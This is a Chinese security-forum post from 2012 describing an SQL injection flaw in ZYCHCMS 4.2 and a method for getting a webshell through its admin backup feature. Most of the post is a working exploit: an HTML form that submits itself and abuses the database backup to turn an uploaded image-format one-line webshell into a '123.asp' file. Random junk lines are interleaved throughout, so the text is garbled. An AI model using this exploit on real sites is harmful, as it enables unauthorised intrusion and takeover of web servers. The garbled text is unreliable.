中国网络渗透测试联盟
标题:
ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell
[打印本页]
作者:
admin
时间:
2012-9-10 21:09
标题:
ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell
4 Q( } f+ E. ?2 @# \
5 I, b4 K: b! I' `5 q, h2 m: @
3 B' @4 e# p3 B j# ~
4 J4 t. X$ t& y" i! A
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
5 v# q; x+ v2 ]% S
①SQL注射漏洞
! h; H& |+ t( D7 f6 }
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
; ~$ z3 w4 t( e" w, t" a
漏洞原因:未过滤
4 F0 F! o% M% R
漏洞代码:
6 f! E, q) R' X2 y( ]7 U
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
. R3 g1 ^5 h/ c* S3 T7 H# S, f% g
修复方法:在文件开头加入代码
P7 O3 b5 s0 `# ~8 z, T
4 }0 [ Z2 O3 U4 i+ d1 [! Z
/ I$ A; L" E: U5 `& Q* S2 \, L
②后台拿WBSHELL
! I% j9 k9 Y5 V7 l
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
# z# q- ]4 q; v' M# ]
这里在网上找了一个,改了下,将就着用。
1 h' \& U: Y* t! Y
以下是代码本地提交代码
/ Q4 a9 `; |' |) Y& \
- \/ X( @. L/ p) h8 G
4 z% l+ ^% w6 @4 @
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
* H" S$ t4 |) j% ]6 |/ \- e
<!–eg:
http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup
–>
) x3 P5 _* w8 Q) m8 x/ {
<tr>
% B4 R- X7 s1 |% ?7 J1 e8 J" v
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
$ C' B( F9 I3 a9 Y5 h8 t2 ~
</tr>
- o W- W6 V+ @( f3 x
<tr>
$ G( a) ^, ] |: u `. [
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
: u/ w8 X0 n! {+ T( l
</span>
9 z6 ^, y7 J) P( r' b( [4 e" q
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
6 A* ~: h3 S6 b9 H% b5 l# H
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
$ Z6 Q9 p$ n U1 o+ o5 `
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
. Z0 W* v9 I, ]0 [% ^' W: h' {8 g
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
! u3 \/ w$ I- M8 E
<div align=”left”>
$ P* q8 b! B+ u4 \; g8 T
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
0 H4 w, d, {) _& J
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
4 _8 s) O$ I) Z- D5 U W
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
. u3 ^! t2 a* I$ |6 f/ s
</div></td>
6 \+ r, f; O7 C; M7 o
</tr>
* O6 x' p) P* |
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
7 i" ^5 u; ~9 I
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
& e* J; Q" s5 ?+ i7 Y7 \
<td class=”td”><div align=”left”>
4 l7 f. N& B6 \+ U6 J" c
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
2 L* q; N9 ?4 h) u
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
$ T4 x4 \% x9 I, B% t6 l
</tr>
4 Q+ q! [9 D4 |* l
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
* V5 k4 I0 D% G0 z
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
0 i7 N/ f: \" ~( w$ O* [( ?
<td class=”td”><div align=”left”>
. b X: k8 N6 Z1 ?. Q1 i) T
<input type=”submit” value=”确定备份” class=”btn”
8 b. m1 \' S$ b
</div></td>
9 R7 g! T6 z5 G$ f
</tr>
8 V5 d; F5 G# N# Y' s
</table></td></tr></form>
0 E1 L" N- x! I! H% t; n
</table>
) Q& z) ^' g, F; m; P3 J7 g
</td>
8 K$ p7 d/ F' N5 X* V/ x8 W
</tr>
9 X E2 a! C. k( _7 f K# l, Y5 s
</table>
8 \1 |$ f' A2 V/ S$ A
<script>
0 g9 U3 C! y7 C- X8 ^' e
document.all.add.submit();
/ r9 X+ K; W$ x, [6 `3 N
</script>
, o* v; W6 h5 O" z, ?5 {
! s) V7 r% q0 |; O! x
$ r) y5 y. S6 R" F
: ?, t: D$ G+ @: d* A% D
; u% a. H6 ^! N8 C B
; N) w' T' i- A3 _- \. b
) [& M! u @: E
: |% A+ k! I, W
- z* |, d$ T" s- E4 z- b& m
% O8 w( ?, p: D. L
% E+ C2 ~' h0 G* S* r0 I: k
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2